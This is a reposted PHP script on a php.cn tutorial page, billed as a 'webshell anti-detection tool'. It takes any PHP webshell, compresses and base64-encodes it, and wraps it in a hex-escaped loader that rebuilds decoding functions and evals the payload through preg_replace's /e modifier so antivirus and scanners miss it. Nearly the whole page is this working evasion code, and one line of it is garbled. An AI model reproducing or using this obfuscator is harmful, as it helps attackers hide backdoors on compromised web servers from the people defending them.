Maison >développement back-end >tutoriel php >php写的webshell超强免杀工具的代码

php写的webshell超强免杀工具的代码

WBOY
WBOYoriginal
2016-07-25 09:03:341561parcourir
  1. /*
  2. Title: PHP shell nokill T00L
  3. Blog: exploit-db.blogcn.com
  4. */
  5. error_reporting(0);
  6. @ini_set('memory_limit','-1');
  7. set_time_limit(0);
  8. $toolname="$argv[0]";
  9. if ($argcbaner($toolname);
  10. die;
  11. }
  12. $input_file= trim($argv[1]);
  13. $output_file='nokill_'.$input_file;
  14. if (file_exists($input_file)) {
  15. No_kill_c0de($input_file,$output_file);
  16. echo "PHP shell nokill T00L\r\n";
  17. echo "Blog: exploit-db.blogcn.com\r\n";
  18. echo "Input: {$input_file}\r\n";
  19. $file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file;
  20. echo "[+] Generate success!\r\n";
  21. echo "Saved to {$file_full_path}"."\r\n";
  22. } else {
  23. echo "PHP shell nokill T00L\r\n";
  24. echo "Blog: exploit-db.blogcn.com\r\n";
  25. die("[-] Failed ! The File $input_file does not exist");
  26. }
  27. function No_kill_c0de($input_file,$output_file){
  28. $no_whitespace=php_strip_whitespace($input_file);
  29. $no_php_tag=trim(trim(trim($no_whitespace,'');
  30. $enfile=base64_encode(gzdeflate($no_php_tag));
  31. $shellcode="\x3c\x3f\x70\x68\x70\xd\xa";
  32. $shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."\xd\xa";
  33. $shellcode.="\x24\x62\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x66\x27\x2c\x22\x22\x2c\x22\x62\x66\x61\x66\x73\x66\x65\x66\x36\x66\x34\x66\x5f\x66\x66\x64\x66\x66\x65\x66\x66\x63\x66\x66\x6f\x66\x66\x64\x66\x66\x65\x66\x22\x29\x3b\xd\xa\x24\x67\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x58\x27\x2c\x27\x27\x2c\x27\x67\x58\x58\x7a\x58\x58\x69\x58\x58\x6e\x58\x58\x58\x58\x66\x58\x58\x58\x6c\x58\x58\x61\x58\x58\x58\x74\x58\x58\x58\x58\x58\x65\x27\x29\x3b\xd\xa\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x5c\x27\x61\x5c\x27\x65\x69\x73\x27\x2c\x27\x65\x27\x2e\x27\x76\x27\x2e\x27\x61\x27\x2e\x27\x6c\x27\x2e\x27\x28\x24\x67\x28\x24\x62\x28\x24\x65\x6e\x66\x69\x6c\x65\x29\x29\x29\x27\x2c\x27\x61\x27\x29\x3b\xd\xa";
  34. $shellcode.="\x3f\x3e";
  35. file_put_contents("$output_file",$shellcode);
  36. }
  37. function baner($toolname){
  38. echo "PHP shell nokill T00L\r\n";
  39. echo "Blog: exploit-db.blogcn.com\r\n";
  40. echo "Usage: {$toolname} phpwebshell\r\n";
  41. }
  42. ?>
复制代码


Déclaration:
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn